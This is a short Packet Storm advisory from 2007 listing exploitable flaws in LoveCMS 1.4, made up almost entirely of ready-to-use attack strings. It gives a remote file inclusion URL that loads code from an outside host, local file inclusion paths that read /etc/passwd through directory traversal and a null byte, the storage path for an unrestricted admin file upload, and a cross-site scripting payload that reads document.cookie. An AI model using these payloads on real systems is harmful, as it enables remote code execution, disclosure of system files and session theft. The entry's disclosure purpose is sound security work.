lovecms14-multi.txt

2007-02-24T00:00:00
ID PACKETSTORM:54647
Type packetstorm
Reporter laurent gaffie
Modified 2007-02-24T00:00:00

Description

                                        
                                            `rfi:  
/lovecms/install/index.php?step=http://site.com/boum.txt?  
  
lfi:  
/lovecms/install/index.php?step=/etc/passwd%00  
/lovecms/?load=../../../../../../../../../../etc/passwd%00  
  
admin upload vuln :  
upload any kind of file even if it's not accepted it will be stored here :  
/modules/content/pictures/tmp/  
  
xss get via error sql:  
/lovecms/?load=content&id='</textarea>'"><script>alert(document.cookie)</script>  
  
laurent gaffié  
`